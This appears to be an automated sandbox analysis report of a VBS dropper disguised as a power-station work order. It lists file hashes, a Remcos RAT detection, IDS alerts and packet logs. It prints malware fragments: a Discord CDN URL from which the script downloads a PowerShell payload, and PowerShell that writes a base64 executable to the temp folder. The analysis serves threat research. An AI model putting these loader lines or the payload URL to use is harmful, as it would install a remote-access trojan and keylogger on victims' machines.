                                                                        update.jsGet hashmaliciousUnknownBrowse
                                                                        • 162.159.129.233
                                                                        file.exeGet hashmaliciousUnknownBrowse
                                                                        • 162.159.129.233
                                                                        file.exeGet hashmaliciousVidarBrowse
                                                                        • 162.159.129.233
                                                                        file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, RedLine, Stealc, VidarBrowse
                                                                        • 162.159.129.233
                                                                        file.exeGet hashmaliciousUnknownBrowse
                                                                        • 162.159.129.233
                                                                        file.exeGet hashmaliciousVidarBrowse
                                                                        • 162.159.129.233
                                                                        No context
                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):144
                                                                        Entropy (8bit):3.359694709764576
                                                                        Encrypted:false
                                                                        SSDEEP:3:rhlKlyKMlFLlfMl8ftql55JWRal2Jl+7R0DAlBG45klovDl6v:6lZQ+Lb5YcIeeDAlOWAv
                                                                        MD5:8F9A9372CAC7A5AAFAFEF49DAF7E4E36
                                                                        SHA1:A7B8CA4578BE06BDE5326704C2B056C1734B32CB
                                                                        SHA-256:D58E2E444D0B567932755F7B05C49BACA6E89AA2D90EE7DB8C55EEC671E1E070
                                                                        SHA-512:F0DDE980D1EB538BA2C0DBA3775A656D39811C6FE12015BE67576779E0487932CE82BB9A441AA51A664050BDCF2434609FB9CEA26A375BA885CEEC53FD530C64
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\remcos\logs.dat, Author: Joe Security
                                                                        Preview:....[.2.0.2.4./.1.2./.1.2. .1.5.:.3.1.:.1.9. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....
                                                                        Process:C:\Windows\System32\wscript.exe
                                                                        File Type:ASCII text, with very long lines (65494), with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):718288
                                                                        Entropy (8bit):5.992925321181216
                                                                        Encrypted:false
                                                                        SSDEEP:12288:Osrd6vBKvQsxcaHkRQQwgFFK2+Exmp4kTAaq5b1bIifiGs:h56v8vxca4QbSFK2+hpFEaqd1bIifZs
                                                                        MD5:CF9811311721D98CED8580790789851B
                                                                        SHA1:5D90E48E9508E7D01B2472F818B42570E1252FDB
                                                                        SHA-256:586BB76A51DC382F8DF76AEBAEDD944F262FC2CB0B5D328F069A8708F2A6679E
                                                                        SHA-512:DC8AAF19002413B0BC9F6374B6DA913E0F5E995922FCB1390C4B65AED3503A1FDB19870A84C0D8AB785992B9F58849520A4B2535B22BD67907A12EFB0BC553A0
                                                                        Malicious:true
                                                                        Preview:$p=[IO.Path]::Combine($env:TEMP,"x.exe")..[IO.File]::WriteAllBytes($p,[Convert]::FromBase64String("TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDALrQv/gAAAAAAAAAAOAAIgALATAAAC4IAAAIAAAAAAAATkwIAAAgAAAAYAgAAABAAAAgAAAAAgAABAAAAAAAAAAGAAAAAAAAAACgCAAAAgAAAAAAAAIAYIUAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAAPRLCABXAAAAAGAIAJYFAAAAAAAAAAAAAAAAAAAAAAAAAIAIAAwAAACYSwgAOAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAAAAAAAAAAAAAAACCAAAEgAAAAAAAAAAAAAAC50ZXh0AAAAVCwIAAAgAAAALggAAAIAAAAAAAAAAAAAAAAAACAAAGAucnNyYwAAAJYFAAAAYAgAAAYAAAAwCAAAAAAAAAAAAAAAAABAAABALnJlbG9jAAAMAAAAAIAIAAACAAAANggAAAAAAAAAAAAAAAAAQAAAQgAAAAAAAAAAAAAAAAAAAAAwTAgAAAAAAEgAAAACAAUAmPMHAABYAAADAAIAOQAABuDyBwC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAALTd+dJjEvWwsF3n4vh/3XmM5VgQlNCuwQvDlDMsdSX6uFNnK4y1fDbmi4YKPR8l+62U+3pkPrZtDv3h6O0AyC0euZ9ll6q5/Yhxif0ccnoKvh5V/
                                                                        Process:C:\Users\user\AppData\Local\Temp\x.exe
                                                                        File Type:CSV text
                                                                        Category:dropped
                                                                        Size (bytes):226
                                                                        Entropy (8bit):5.360398796477698
                                                                        Encrypted:false
                                                                        SSDEEP:6:Q3La/xw5DLIP12MUAvvR+uTL2ql2ABgTv:Q3La/KDLI4MWuPTAv
                                                                        MD5:3A8957C6382192B71471BD14359D0B12
                                                                        SHA1:71B96C965B65A051E7E7D10F61BEBD8CCBB88587
                                                                        SHA-256:282FBEFDDCFAA0A9DBDEE6E123791FC4B8CB870AE9D450E6394D2ACDA3D8F56D
                                                                        SHA-512:76C108641F682F785A97017728ED51565C4F74B61B24E190468E3A2843FCC43615C6C8ABE298750AF238D7A44E97C001E3BE427B49900432F905A7CE114AA9AD
                                                                        Malicious:false
                                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..
                                                                        Process:C:\Windows\System32\wscript.exe
                                                                        File Type:ASCII text, with very long lines (65494), with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):718288
                                                                        Entropy (8bit):5.992925321181216
                                                                        Encrypted:false
                                                                        SSDEEP:12288:Osrd6vBKvQsxcaHkRQQwgFFK2+Exmp4kTAaq5b1bIifiGs:h56v8vxca4QbSFK2+hpFEaqd1bIifZs
                                                                        MD5:CF9811311721D98CED8580790789851B
                                                                        SHA1:5D90E48E9508E7D01B2472F818B42570E1252FDB
                                                                        SHA-256:586BB76A51DC382F8DF76AEBAEDD944F262FC2CB0B5D328F069A8708F2A6679E
                                                                        SHA-512:DC8AAF19002413B0BC9F6374B6DA913E0F5E995922FCB1390C4B65AED3503A1FDB19870A84C0D8AB785992B9F58849520A4B2535B22BD67907A12EFB0BC553A0
                                                                        Malicious:false
                                                                        Preview:$p=[IO.Path]::Combine($env:TEMP,"x.exe")..[IO.File]::WriteAllBytes($p,[Convert]::FromBase64String("TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDALrQv/gAAAAAAAAAAOAAIgALATAAAC4IAAAIAAAAAAAATkwIAAAgAAAAYAgAAABAAAAgAAAAAgAABAAAAAAAAAAGAAAAAAAAAACgCAAAAgAAAAAAAAIAYIUAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAAPRLCABXAAAAAGAIAJYFAAAAAAAAAAAAAAAAAAAAAAAAAIAIAAwAAACYSwgAOAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAAAAAAAAAAAAAAACCAAAEgAAAAAAAAAAAAAAC50ZXh0AAAAVCwIAAAgAAAALggAAAIAAAAAAAAAAAAAAAAAACAAAGAucnNyYwAAAJYFAAAAYAgAAAYAAAAwCAAAAAAAAAAAAAAAAABAAABALnJlbG9jAAAMAAAAAIAIAAACAAAANggAAAAAAAAAAAAAAAAAQAAAQgAAAAAAAAAAAAAAAAAAAAAwTAgAAAAAAEgAAAACAAUAmPMHAABYAAADAAIAOQAABuDyBwC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAALTd+dJjEvWwsF3n4vh/3XmM5VgQlNCuwQvDlDMsdSX6uFNnK4y1fDbmi4YKPR8l+62U+3pkPrZtDv3h6O0AyC0euZ9ll6q5/Yhxif0ccnoKvh5V/
                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                        File Type:JSON data
                                                                        Category:dropped
                                                                        Size (bytes):963
                                                                        Entropy (8bit):5.018384957371898
                                                                        Encrypted:false
                                                                        SSDEEP:12:tkluWJmnd6CsGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zz2:qlupdRNuKyGX85jvXhNlT3/7CcVKWro
                                                                        MD5:C9BB4D5FD5C8A01D20EBF8334B62AE54
                                                                        SHA1:D38895F4CBB44CB10B6512A19034F14A2FC40359
                                                                        SHA-256:767218EC255B7E851971A77B773C0ECC59DC0B179ECA46ABCC29047EEE6216AA
                                                                        SHA-512:2D412433053610C0229FB3B73A26C8FB684F0A4AB03A53D0533FDC52D4E9882C25037015ACE7D4A411214AA9FAA780A8D950A83B57B200A877E26D7890977157
                                                                        Malicious:false
                                                                        Preview:{. "geoplugin_request":"8.46.123.189",. "geoplugin_status":200,. "geoplugin_delay":"1ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7503",. "geoplugin_longitude":"-74.0014",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):64
                                                                        Entropy (8bit):1.1940658735648508
                                                                        Encrypted:false
                                                                        SSDEEP:3:Nlllul1jR:NllU
                                                                        MD5:0EC63F8643FAD46EC878DB86E00F7FF5
                                                                        SHA1:53D9444F5369A346E09B2E3D95E06D838BD43A52
                                                                        SHA-256:E35DD4598E36CB170B240FD08843073B98DD8BDA901C13FCEBC923ABA2EAE934
                                                                        SHA-512:EF572FBB9395F9077C737A458960558BDB7CBBDD183001ECEB1ABF4B82784F0B16E3A7BA1F1F3353E73387AEBC28952A198979E10FE3FD13F2064E69DA69677F
                                                                        Malicious:false
                                                                        Preview:@...e..................................."............@..........
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):538624
                                                                        Entropy (8bit):7.969959028878731
                                                                        Encrypted:false
                                                                        SSDEEP:12288:+xEVvmrlb6Z/e+LcWITxSe6+NmaABsv4xRDpnq0MZUK82fTUNOQ6jqtaG:62vIBqm+A1xSe6+NEOyy07KdTUNF6j
                                                                        MD5:2C248753C0D81181227BB95C0BC614CF
                                                                        SHA1:86A24F456DA864A009EDBC5B3A95877FCB9479A4
                                                                        SHA-256:65EC50AC4D13E4386D497E33D20D5E679A0460727795EB3E8A2F7DFECDF8C4F3
                                                                        SHA-512:F22685E9DA58F9A044799A527CB5A9E1DA3067875EBC8E4FD4200A4647918A5B1241B4C05AA964B8615CA8F03A99006DA69D30935DCEE80D2959183DAF29FA40
                                                                        Malicious:true
                                                                        Antivirus:
                                                                        • Antivirus: Avira, Detection: 100%
                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................"...0.............NL... ...`....@.. ....................................`..................................K..W....`...............................K..8............................................ ............... ..H............text...T,... ...................... ..`.rsrc........`.......0..............@..@.reloc...............6..............@..B................0L......H............X......9.......................................................c....].....y..X......3,u%..Sg+..|6..=.%....zd>.m.......-...e.....q...rz...U....o3x.K.g.,..uGX..P..N...Y.n....n.....z>..u....eB.i...$.o...5.....&d.Q.v..N...........wK0..0......e..6G.......h..L.u.....'..a.^>]....4,.4....A.^O....v.=...........:u.%....6....13R.6k..Ir.+.!..qP..(..VX..!4t..t.#n...OlM~J...S......[...>R...[..>.Sm.....8f{.N......u...".E3.Q.0..H...<TGz...n.....6.....y"`.~TR|.
                                                                        Process:C:\Windows\System32\wscript.exe
                                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Archive, ctime=Wed Oct 4 11:02:31 2023, mtime=Thu Dec 12 19:31:05 2024, atime=Thu Dec 12 19:31:03 2024, length=3047, window=hide
                                                                        Category:dropped
                                                                        Size (bytes):791
                                                                        Entropy (8bit):5.000959626663932
                                                                        Encrypted:false
                                                                        SSDEEP:24:8mGsn16rlu+fDNAZ8moQgWfDsJMqL3LEBm:8mGE1mHGCZAsJM
                                                                        MD5:5AC3124DF71533D4A268D9FE2DD882B4
                                                                        SHA1:24442C2196D2F7C8C51525D1DDAEE96B072655EE
                                                                        SHA-256:65974028B56CF467A7F1DAC198A056BD289A2A9768F78186529AAD4F26D9E7A0
                                                                        SHA-512:E12C5035B7B0D10EAF8225A43D556E732B41D1487368E68760AD8B06ED2FE37F7096AAD336E4C214F6392EA2E17D66D173921FDA9C808BD765EDE0EB0E004CBF
                                                                        Malicious:true
                                                                        Preview:L..................F.... ...G........@p..L...I...L...............................P.O. .:i.....+00.:...:..,.LB.)...A&...&......-/.v.....8.....f....L......2......Y. .WO-663~1.VBS.........DWP`.Y............................. .W.O.-.6.6.3.0.7.1. .S.a.b.i.y.a. .P.o.w.e.r. .S.t.a.t.i.o.n. .P.r.o.j.e.c.t...v.b.s.......p...............-.......o............W+......C:\Users\user\Desktop\WO-663071 Sabiya Power Station Project.vbs..G.....\.....\.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.W.O.-.6.6.3.0.7.1. .S.a.b.i.y.a. .P.o.w.e.r. .S.t.a.t.i.o.n. .P.r.o.j.e.c.t...v.b.s...C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.D.e.s.k.t.o.p.`.......X.......932923...........hT..CrF.f4... ..~T..b...,.......hT..CrF.f4... ..~T..b...,......E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................
                                                                        File type:ASCII text, with CRLF line terminators
                                                                        Entropy (8bit):5.141546408111851
                                                                        TrID:
                                                                        • Visual Basic Script (13500/0) 100.00%
                                                                        File name:WO-663071 Sabiya Power Station Project.vbs
                                                                        File size:3'047 bytes
                                                                        MD5:29e1bb22ea494b25e915d1b72b50bfc8
                                                                        SHA1:37b7b92709d22bfe4ae4c18258c3cf6751ae53d2
                                                                        SHA256:9d5fab129071f6d09f1d45e80991c60459680aab2e6591f8b2cec9909e37a5eb
                                                                        SHA512:5ac2953bf6868f7a99bcd97efd75d5fe679649ed7b796918e23f7f90a2441715034594c2080f02a2e80c22153b04a14fa3650bd2f8f732f91808864bbe8d6e30
                                                                        SSDEEP:48:ICqSVNiLaRE/jyJ2yAwJGrn/kJBJk/mquQCxJ2d1Heonr+/q:ICqSbGryJ3HJGr/kJfk/mrQeJ2d1Heor
                                                                        TLSH:2B515427FD02C32198378F4E857ED85CCA02445F1110C914BD9C894A7F32BEEDEB828A
                                                                        File Content Preview:' Constants to avoid magic strings..Const URL = "https://cdn.discordapp.com/attachments/1295304757166080020/1316684745500790864/IGBO.ps1?ex=675bf1ba&is=675aa03a&hm=3e85baf94837620960229189756d21650fd643b90a2f7188dd60919d17e93238&"..Const DownloadPath = "C
                                                                        Icon Hash:68d69b8f86ab9a86
                                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                        2024-12-12T21:31:08.856544+01002018856ET MALWARE Windows executable base64 encoded1162.159.129.233443192.168.2.449730TCP
                                                                        2024-12-12T21:31:21.997993+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449731162.251.122.872404TCP
                                                                        2024-12-12T21:31:24.469001+01002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.449733178.237.33.5080TCP
                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                        Dec 12, 2024 21:31:06.877247095 CET49730443192.168.2.4162.159.129.233
                                                                        Dec 12, 2024 21:31:06.877305984 CET44349730162.159.129.233192.168.2.4
                                                                        Dec 12, 2024 21:31:06.877371073 CET49730443192.168.2.4162.159.129.233
                                                                        Dec 12, 2024 21:31:06.885008097 CET49730443192.168.2.4162.159.129.233
                                                                        Dec 12, 2024 21:31:06.885050058 CET44349730162.159.129.233192.168.2.4
                                                                        Dec 12, 2024 21:31:08.110006094 CET44349730162.159.129.233192.168.2.4
                                                                        Dec 12, 2024 21:31:08.110091925 CET49730443192.168.2.4162.159.129.233
                                                                        Dec 12, 2024 21:31:08.165095091 CET49730443192.168.2.4162.159.129.233
                                                                        Dec 12, 2024 21:31:08.165146112 CET44349730162.159.129.233192.168.2.4
                                                                        Dec 12, 2024 21:31:08.165504932 CET44349730162.159.129.233192.168.2.4
                                                                        Dec 12, 2024 21:31:08.165575981 CET49730443192.168.2.4162.159.129.233
                                                                        Dec 12, 2024 21:31:08.168278933 CET49730443192.168.2.4162.159.129.233
                                                                        Dec 12, 2024 21:31:08.211338997 CET44349730162.159.129.233192.168.2.4
                                                                        Dec 12, 2024 21:31:08.585979939 CET44349730162.159.129.233192.168.2.4
                                                                        Dec 12, 2024 21:31:08.586096048 CET49730443192.168.2.4162.159.129.233
                                                                        Dec 12, 2024 21:31:08.586119890 CET44349730162.159.129.233192.168.2.4
                                                                        Dec 12, 2024 21:31:08.586168051 CET49730443192.168.2.4162.159.129.233
                                                                        Dec 12, 2024 21:31:08.586524010 CET44349730162.159.129.233192.168.2.4
                                                                        Dec 12, 2024 21:31:08.586574078 CET49730443192.168.2.4162.159.129.233
                                                                        Dec 12, 2024 21:31:08.586577892 CET44349730162.159.129.233192.168.2.4
                                                                        Dec 12, 2024 21:31:08.586591005 CET44349730162.159.129.233192.168.2.4
                                                                        Dec 12, 2024 21:31:08.586616993 CET49730443192.168.2.4162.159.129.233
                                                                        Dec 12, 2024 21:31:08.586658955 CET49730443192.168.2.4162.159.129.233
                                                                        Dec 12, 2024 21:31:08.586667061 CET44349730162.159.129.233192.168.2.4
                                                                        Dec 12, 2024 21:31:08.586709976 CET49730443192.168.2.4162.159.129.233
                                                                        Dec 12, 2024 21:31:08.587028980 CET44349730162.159.129.233192.168.2.4
                                                                        Dec 12, 2024 21:31:08.587069035 CET49730443192.168.2.4162.159.129.233
                                                                        Dec 12, 2024 21:31:08.594014883 CET44349730162.159.129.233192.168.2.4
                                                                        Dec 12, 2024 21:31:08.594065905 CET49730443192.168.2.4162.159.129.233
                                                                        Dec 12, 2024 21:31:08.594099045 CET44349730162.159.129.233192.168.2.4
                                                                        Dec 12, 2024 21:31:08.594145060 CET49730443192.168.2.4162.159.129.233
                                                                        Dec 12, 2024 21:31:08.602283955 CET44349730162.159.129.233192.168.2.4
                                                                        Dec 12, 2024 21:31:08.602351904 CET49730443192.168.2.4162.159.129.233
                                                                        Dec 12, 2024 21:31:08.610245943 CET44349730162.159.129.233192.168.2.4
                                                                        Dec 12, 2024 21:31:08.610306025 CET49730443192.168.2.4162.159.129.233
                                                                        Dec 12, 2024 21:31:08.705667973 CET44349730162.159.129.233192.168.2.4
                                                                        Dec 12, 2024 21:31:08.705790043 CET49730443192.168.2.4162.159.129.233
                                                                        Dec 12, 2024 21:31:08.705807924 CET44349730162.159.129.233192.168.2.4
                                                                        Dec 12, 2024 21:31:08.705857992 CET49730443192.168.2.4162.159.129.233
                                                                        Dec 12, 2024 21:31:08.709770918 CET44349730162.159.129.233192.168.2.4
                                                                        Dec 12, 2024 21:31:08.709830046 CET49730443192.168.2.4162.159.129.233
                                                                        Dec 12, 2024 21:31:08.777697086 CET44349730162.159.129.233192.168.2.4
                                                                        Dec 12, 2024 21:31:08.777827978 CET49730443192.168.2.4162.159.129.233
                                                                        Dec 12, 2024 21:31:08.781310081 CET44349730162.159.129.233192.168.2.4
                                                                        Dec 12, 2024 21:31:08.781373024 CET49730443192.168.2.4162.159.129.233
                                                                        Dec 12, 2024 21:31:08.782793999 CET44349730162.159.129.233192.168.2.4
                                                                        Dec 12, 2024 21:31:08.782840014 CET49730443192.168.2.4162.159.129.233
                                                                        Dec 12, 2024 21:31:08.787736893 CET44349730162.159.129.233192.168.2.4
                                                                        Dec 12, 2024 21:31:08.787842035 CET49730443192.168.2.4162.159.129.233
                                                                        Dec 12, 2024 21:31:08.787859917 CET44349730162.159.129.233192.168.2.4
                                                                        Dec 12, 2024 21:31:08.787904978 CET49730443192.168.2.4162.159.129.233
                                                                        Dec 12, 2024 21:31:08.795747042 CET44349730162.159.129.233192.168.2.4
                                                                        Dec 12, 2024 21:31:08.795855045 CET49730443192.168.2.4162.159.129.233
                                                                        Dec 12, 2024 21:31:08.803750992 CET44349730162.159.129.233192.168.2.4
                                                                        Dec 12, 2024 21:31:08.803834915 CET49730443192.168.2.4162.159.129.233
                                                                        Dec 12, 2024 21:31:08.803894997 CET44349730162.159.129.233192.168.2.4
                                                                        Dec 12, 2024 21:31:08.803946018 CET49730443192.168.2.4162.159.129.233
                                                                        Dec 12, 2024 21:31:08.811611891 CET44349730162.159.129.233192.168.2.4
                                                                        Dec 12, 2024 21:31:08.811682940 CET49730443192.168.2.4162.159.129.233
                                                                        Dec 12, 2024 21:31:08.811702013 CET44349730162.159.129.233192.168.2.4
                                                                        Dec 12, 2024 21:31:08.811739922 CET49730443192.168.2.4162.159.129.233
                                                                        Dec 12, 2024 21:31:08.819638014 CET44349730162.159.129.233192.168.2.4
                                                                        Dec 12, 2024 21:31:08.819700956 CET49730443192.168.2.4162.159.129.233
                                                                        Dec 12, 2024 21:31:08.819799900 CET44349730162.159.129.233192.168.2.4
                                                                        Dec 12, 2024 21:31:08.819840908 CET49730443192.168.2.4162.159.129.233
                                                                        Dec 12, 2024 21:31:08.827528000 CET44349730162.159.129.233192.168.2.4
                                                                        Dec 12, 2024 21:31:08.827590942 CET49730443192.168.2.4162.159.129.233
                                                                        Dec 12, 2024 21:31:08.827620029 CET44349730162.159.129.233192.168.2.4
                                                                        Dec 12, 2024 21:31:08.827660084 CET49730443192.168.2.4162.159.129.233
                                                                        Dec 12, 2024 21:31:08.835628986 CET44349730162.159.129.233192.168.2.4
                                                                        Dec 12, 2024 21:31:08.835691929 CET49730443192.168.2.4162.159.129.233
                                                                        Dec 12, 2024 21:31:08.843602896 CET44349730162.159.129.233192.168.2.4
                                                                        Dec 12, 2024 21:31:08.843676090 CET49730443192.168.2.4162.159.129.233
                                                                        Dec 12, 2024 21:31:08.843689919 CET44349730162.159.129.233192.168.2.4
                                                                        Dec 12, 2024 21:31:08.843730927 CET49730443192.168.2.4162.159.129.233
                                                                        Dec 12, 2024 21:31:08.850073099 CET44349730162.159.129.233192.168.2.4
                                                                        Dec 12, 2024 21:31:08.850143909 CET49730443192.168.2.4162.159.129.233
                                                                        Dec 12, 2024 21:31:08.850400925 CET44349730162.159.129.233192.168.2.4
                                                                        Dec 12, 2024 21:31:08.850450993 CET49730443192.168.2.4162.159.129.233
                                                                        Dec 12, 2024 21:31:08.856301069 CET44349730162.159.129.233192.168.2.4
                                                                        Dec 12, 2024 21:31:08.856364965 CET49730443192.168.2.4162.159.129.233
                                                                        Dec 12, 2024 21:31:08.856549025 CET44349730162.159.129.233192.168.2.4
                                                                        Dec 12, 2024 21:31:08.856595039 CET49730443192.168.2.4162.159.129.233
                                                                        Dec 12, 2024 21:31:08.862736940 CET44349730162.159.129.233192.168.2.4
                                                                        Dec 12, 2024 21:31:08.862793922 CET49730443192.168.2.4162.159.129.233
                                                                        Dec 12, 2024 21:31:08.868947983 CET44349730162.159.129.233192.168.2.4
                                                                        Dec 12, 2024 21:31:08.869028091 CET49730443192.168.2.4162.159.129.233
                                                                        Dec 12, 2024 21:31:08.869041920 CET44349730162.159.129.233192.168.2.4
                                                                        Dec 12, 2024 21:31:08.869081974 CET49730443192.168.2.4162.159.129.233
                                                                        Dec 12, 2024 21:31:08.969470978 CET44349730162.159.129.233192.168.2.4
                                                                        Dec 12, 2024 21:31:08.969598055 CET49730443192.168.2.4162.159.129.233
                                                                        Dec 12, 2024 21:31:08.970621109 CET44349730162.159.129.233192.168.2.4
                                                                        Dec 12, 2024 21:31:08.970674992 CET49730443192.168.2.4162.159.129.233
                                                                        Dec 12, 2024 21:31:08.970719099 CET44349730162.159.129.233192.168.2.4
                                                                        Dec 12, 2024 21:31:08.970761061 CET49730443192.168.2.4162.159.129.233
                                                                        Dec 12, 2024 21:31:08.975045919 CET44349730162.159.129.233192.168.2.4
                                                                        Dec 12, 2024 21:31:08.975100994 CET49730443192.168.2.4162.159.129.233
                                                                        Dec 12, 2024 21:31:08.978800058 CET44349730162.159.129.233192.168.2.4
                                                                        Dec 12, 2024 21:31:08.978852987 CET49730443192.168.2.4162.159.129.233
                                                                        Dec 12, 2024 21:31:08.983019114 CET44349730162.159.129.233192.168.2.4
                                                                        Dec 12, 2024 21:31:08.983081102 CET49730443192.168.2.4162.159.129.233
                                                                        Dec 12, 2024 21:31:08.991758108 CET44349730162.159.129.233192.168.2.4
                                                                        Dec 12, 2024 21:31:08.991944075 CET49730443192.168.2.4162.159.129.233
                                                                        Dec 12, 2024 21:31:08.995397091 CET44349730162.159.129.233192.168.2.4
                                                                        Dec 12, 2024 21:31:08.995471001 CET49730443192.168.2.4162.159.129.233
                                                                        Dec 12, 2024 21:31:08.999391079 CET44349730162.159.129.233192.168.2.4
